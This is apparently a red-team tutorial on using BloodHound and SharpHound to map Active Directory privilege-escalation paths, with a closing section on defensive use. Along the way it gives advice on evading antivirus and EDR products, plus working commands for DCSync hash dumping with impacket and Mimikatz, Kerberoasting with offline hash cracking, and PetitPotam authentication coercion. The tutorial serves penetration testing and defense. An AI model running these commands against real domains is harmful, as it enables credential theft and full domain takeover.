You’ve just popped a shell as a low-privileged domain user. You have valid credentials, a foothold inside the perimeter, and somewhere in this Active Directory environment is a path to Domain Admin. The problem: you have no idea what that path looks like. The environment has thousands of user accounts, hundreds of groups, dozens of GPOs, and an ACL structure that nobody fully understands — including the people who built it.

This is exactly the problem BloodHound was built to solve.

TL;DR

  • BloodHound maps Active Directory as a graph — users, computers, groups, and permissions become nodes connected by edges representing attack paths
  • SharpHound collects the raw AD data; BloodHound visualizes it and finds the shortest paths to privileged targets
  • Pre-built queries find DCSync rights, AS-REP roastable accounts, Kerberoastable users, and paths to Domain Admins instantly
  • Custom Cypher queries let you hunt for anything the pre-built queries miss
  • Defenders should run BloodHound against their own environment before attackers do — knowing your attack surface is half the battle

What BloodHound Actually Is

Most people describe BloodHound as “an AD enumeration tool.” That description undersells it significantly. BloodHound is a graph database analysis platform built on Neo4j. Every object in Active Directory — users, groups, computers, OUs, GPOs, domains — becomes a node. Every relationship between those objects — group membership, ACL permissions, session data, trust relationships — becomes a directed edge connecting those nodes.

The insight that makes BloodHound powerful: privilege escalation in Active Directory is a graph traversal problem. An attacker doesn’t need to own an account that directly has Domain Admin rights. They need to find a chain of relationships that leads to an account with those rights. BloodHound’s graph queries find those chains automatically, even when the chain spans five or six intermediate steps that no human would trace manually.

BloodHound sees your Active Directory the same way an attacker does: not as a list of users and permissions, but as a web of relationships where any single misconfig can create a highway to the keys of the kingdom.

Setup: BloodHound CE and SharpHound

BloodHound Community Edition via Docker

BloodHound Community Edition (BHCE) is the free, open-source version maintained by SpecterOps. The fastest way to get it running is Docker Compose.

Terminal window
# Download the official compose file
curl -L https://ghst.ly/getbhce -o docker-compose.yml


# Start BloodHound CE (pulls images automatically)
docker compose up -d


# Check that containers are healthy
docker compose ps

Once running, open http://localhost:8080 in your browser. The first-run wizard will prompt you to set an admin password. The default credentials printed in the container logs are temporary — change them immediately.

BloodHound CE runs three containers: the BloodHound application server, a PostgreSQL database for configuration, and a Neo4j graph database where all the AD relationship data lives.

SharpHound: The Data Collector

SharpHound is the official collector for BloodHound CE. It’s a compiled C# binary that runs on a domain-joined Windows machine, queries Active Directory through LDAP, and packages the results into a zip file you upload to BloodHound.

Download the latest release from the BloodHound CE GitHub releases page. You want SharpHound.exe (or the PowerShell version, SharpHound.ps1).

OPSEC note: Many AV and EDR products have signatures for SharpHound on disk. If you’re on a mature endpoint, execute it in-memory using your C2 framework’s assembly execution capability (Cobalt Strike’s execute-assembly, Havoc’s dotnet inline-execute, etc.) to avoid touching disk entirely.

Data Collection with SharpHound

Running the Collector

The simplest collection command grabs everything:

Terminal window
SharpHound.exe -c All --zipfilename results.zip

This single command collects:

  • Group memberships — who belongs to what group, including nested groups
  • ACLs (Access Control Lists) — who has what permissions over AD objects (GenericAll, GenericWrite, WriteDacl, Owns, etc.)
  • Sessions — which users are currently logged into which computers (sampled from Windows API calls)
  • Local group memberships — who is a local admin on each domain-joined machine
  • GPO links — which Group Policy Objects apply to which OUs and computers
  • Domain trusts — relationships between domains and forests
  • Kerberos delegation — unconstrained, constrained, and resource-based constrained delegation configurations

The collection against a medium-sized domain (5,000–10,000 objects) typically finishes in 5–15 minutes.

What Generates Noise

The -c All flag includes session enumeration, which makes network connections to every reachable domain-joined computer to query logged-in sessions via the NetSessionEnum and NetWkstaUserEnum APIs. This generates significant lateral network traffic and can trigger network-based detections.

If stealth is a priority, drop session collection:

Terminal window
# Quieter collection — no lateral network traffic
SharpHound.exe -c DCOnly --zipfilename results.zip


# Or skip session enumeration specifically
SharpHound.exe -c All,ExcludeDCRegistry --zipfilename results.zip

DCOnly limits collection to what can be queried from the domain controller via LDAP — still gets you group memberships, ACLs, GPOs, and trusts, but no session data.

For ongoing engagements, loop collection builds up session data over time:

Terminal window
# Collect sessions every 15 minutes for 2 hours
SharpHound.exe -c Session --Loop --LoopDuration 02:00:00 --LoopInterval 00:15:00

Importing and Navigating BloodHound

Uploading the Data

In the BloodHound CE web interface, click the upload button (top right, looks like a cloud with an arrow) and select your zip file. Ingestion time depends on environment size — a typical enterprise domain takes a few minutes. You’ll see a progress indicator while BloodHound processes the JSON files inside the zip.

Once ingestion completes, the “Explore” tab becomes your primary workspace.

Pre-Built Queries: Where to Start

BloodHound CE ships with pre-built queries that answer the most important red team questions immediately. Access them through the “Cypher” search panel or the pre-built query list.

The queries every red teamer runs first:

Find Shortest Paths to Domain Admins — the most important query. BloodHound calculates the shortest graph path from any node to any member of the Domain Admins group. If your current user has a three-hop path to DA, this query shows it.

Find Principals with DCSync Rights — identifies accounts holding the DS-Replication-Get-Changes-All and DS-Replication-Get-Changes permissions on the domain object. These accounts can run a DCSync attack to dump all NTLM hashes without touching LSASS on any machine.

Find AS-REP Roastable Users — accounts with DONT_REQ_PREAUTH set. No password needed to request an AS-REP; the response is encrypted with the user’s hash and crackable offline.

Find Kerberoastable Members of High Value Groups — Kerberoastable service accounts that are members of privileged groups. Cracking one of these accounts directly gives group membership in a high-value target.

Shortest Paths from Owned Principals — after marking your current user as “owned,” this query shows paths to Domain Admins specifically reachable from your account.

Reading Attack Paths

How the Graph Works

When BloodHound renders an attack path, you see nodes (circles) connected by directed arrows. Each arrow is an edge with a label describing the relationship type. The direction of the arrow indicates the direction of control — an arrow pointing from User A to Group B labeled MemberOf means User A is a member of Group B and inherits that group’s permissions.

Example attack path:

jsmith (User)
  → [GenericWrite] →
svc_backup (User)
  → [MemberOf] →
Backup Operators (Group)
  → [MemberOf] →
Domain Admins (Group)

Reading this: your compromised account jsmith has GenericWrite over svc_backup. That service account is a member of Backup Operators, which is itself nested inside Domain Admins. You don’t need to directly control a DA account — you just need to abuse the GenericWrite permission to take over svc_backup.

To understand any edge, right-click it and select “Help”. BloodHound will show you exactly what the edge means, what the abuse technique is, and often links to tooling.

Edge Types Reference

EdgeWhat it MeansAbuse Technique
MemberOfDirect group membershipInherit group permissions
GenericAllFull control over the objectReset password, add to groups, Kerberoast, Shadow Credentials
GenericWriteWrite to non-protected attributesSet SPN → Kerberoast, set msDS-KeyCredentialLink → Shadow Credentials
WriteOwnerCan set the object’s ownerTake ownership → grant yourself GenericAll
WriteDaclCan modify the object’s ACLGrant yourself GenericAll
OwnsIs the object’s ownerSame as WriteOwner abuse
HasSessionA user has an active session on a computerToken impersonation, credential dumping
AdminToLocal admin rights on a computerRemote code execution, credential dumping
CanRBCDResource-Based Constrained Delegation abuse possibleRBCD attack → impersonate any user to the target service
DCSyncHas AD replication rightsDump all domain hashes without touching LSASS
AllExtendedRightsIncludes all extended rights on the objectForce password change, add to groups
AddMemberCan add members to a groupAdd yourself or a controlled account to the group
ForceChangePasswordCan reset the account’s passwordReset password without knowing current one
ReadLAPSPasswordCan read LAPS local admin passwordGet local admin password for LAPS-managed machines
GPLinkGPO is linked to an OUModify GPO → code execution on all computers in that OU

Key Attack Paths to Hunt

1. Path to Domain Admins

Run “Find Shortest Paths to Domain Admins” and check what your owned accounts can reach. A path exists in almost every real-world domain — the question is how many hops it takes. Even a five-hop path is exploitable. Work backwards from Domain Admins: what groups feed into DA? What accounts have ACL rights over those groups?

2. DCSync Rights

DCSync is the cleanest path to domain compromise. An account with DS-Replication-Get-Changes-All and DS-Replication-Get-Changes on the domain object can impersonate a domain controller and pull NTLM hashes for every account in the domain — including krbtgt, enabling Golden Ticket creation.

Terminal window
# Execute DCSync with impacket (from Linux, network-only)
impacket-secretsdump DOMAIN/user:password@dc-ip -just-dc-ntlm


# With Mimikatz (from Windows)
lsadump::dcsync /domain:corp.local /user:krbtgt

Check the BloodHound query: if any account outside the default replication group (Domain Controllers, Enterprise Domain Controllers) shows up with DCSync rights, that’s a critical finding.

3. Kerberoastable Accounts on the Path

Cross-reference BloodHound’s Kerberoastable user list with accounts that appear on attack paths. A service account with a weak password and AdminTo edges over sensitive computers is a high-value target — crack the hash, then use the credentials.

Terminal window
# Get all Kerberoastable accounts
impacket-GetUserSPNs -request DOMAIN/user:password -dc-ip 10.10.10.1 -outputfile spn_hashes.txt


# Crack with hashcat
hashcat -m 13100 spn_hashes.txt rockyou.txt --rules-file OneRuleToRuleThemAll.rule

4. Unconstrained Delegation Computers

Computers with unconstrained Kerberos delegation store TGTs of every user who authenticates to them. If you can compromise one of these machines (find them via BloodHound’s “Find Computers with Unconstrained Delegation” query) and coerce a Domain Controller to authenticate to it (via PrinterBug/SpoolSample or PetitPotam), you capture the DC’s TGT and can request service tickets as any user — including Domain Admins.

Terminal window
# Find unconstrained delegation machines via BloodHound Cypher
MATCH (c:Computer {unconstraineddelegation: true}) RETURN c.name


# Coerce DC authentication (from attacking machine)
python3 PetitPotam.py -u user -p password attacker-ip dc-ip

5. LAPS Readers

Local Administrator Password Solution (LAPS) rotates local admin passwords and stores them in Active Directory. The ReadLAPSPassword edge in BloodHound shows which accounts can read those stored passwords. If a low-privileged user can read LAPS passwords for a machine that a Domain Admin regularly logs into, that machine becomes a stepping stone.

Custom Cypher Queries

BloodHound’s pre-built queries cover the common cases. Cypher queries let you ask custom questions about the graph. Open the Cypher search panel and run these directly.

All Users with Paths to Domain Admins

// Find every non-admin user who has any path to Domain Admins
MATCH p=shortestPath(
  (u:User)-[*1..]->(g:Group)
)
WHERE g.objectid ENDS WITH "-512"
AND NOT u.admincount = true
RETURN p

Computers with Local Admin from Non-Privileged Users

// Show domain users (not DA/EA) who have AdminTo on computers
MATCH (u:User)-[r:AdminTo]->(c:Computer)
WHERE NOT u.admincount = true
RETURN u.name, c.name
ORDER BY u.name

Accounts with WriteDacl or WriteOwner on Domain Object

// High-value: who can modify ACLs on the domain object itself?
MATCH (n)-[r:WriteDacl|WriteOwner|Owns|GenericAll|GenericWrite]->(d:Domain)
RETURN n.name, type(r), d.name

Kerberoastable Users in Privileged Groups

// Kerberoastable accounts that are members of high-value groups
MATCH (u:User)
WHERE u.hasspn = true
MATCH (u)-[:MemberOf*1..]->(g:Group)
WHERE g.highvalue = true
RETURN u.name, u.pwdlastset, collect(g.name) as groups
ORDER BY u.pwdlastset

The last query is especially useful for prioritizing Kerberoast targets — if you crack a service account that’s already in a privileged group, you skip multiple attack path steps.

Using BloodHound Defensively

Red teamers find attack paths. Blue teamers fix them. BloodHound is equally valuable for defenders, and every organization should be running it against their own environment before an adversary does.

Run It Before the Attackers Do

Deploy SharpHound with a domain service account and ingest the results into your own BloodHound instance. The question you’re answering: “If an attacker compromised any of our 500 helpdesk accounts, what could they reach?” The answer is usually more alarming than expected.

Focus on Choke Points

BloodHound Enterprise research found that cutting a single choke point (a node through which many attack paths pass) severs access to an average of 17,000 attack paths. You don’t need to fix everything. Run the pre-built queries, identify the nodes with the highest “betweenness” in attack paths, and fix those first.

Common high-impact fixes:

  • Remove unnecessary group nesting — especially anything that directly or indirectly feeds into Domain Admins
  • Audit ACL permissions — look for accounts with GenericAll/WriteDacl/WriteOwner on other users or groups they have no business controlling; these are usually the result of historical permission sprawl
  • Disable unconstrained delegation — replace with constrained or resource-based constrained delegation
  • Enforce tiered administration — DA accounts should never be used on workstations; session exposure is a major source of attack path edges
  • Enable LAPS — randomized local admin passwords break lateral movement that relies on credential reuse
  • Set DONT_REQ_PREAUTH accounts to require preauth — eliminates AS-REP Roasting exposure

BloodHound Enterprise for Continuous Monitoring

BloodHound Community Edition is point-in-time. Your AD changes daily — accounts are added, permissions are granted, group memberships shift. BloodHound Enterprise runs continuous collection and tracks how your attack surface evolves over time. It quantifies risk exposure, tracks remediation progress, and alerts when new attack paths appear.

As of 2026, BloodHound Enterprise has expanded beyond AD and Entra ID into Okta, GitHub, Jamf, and other platforms — attack paths now chain across identity systems, not just within Active Directory.

Sources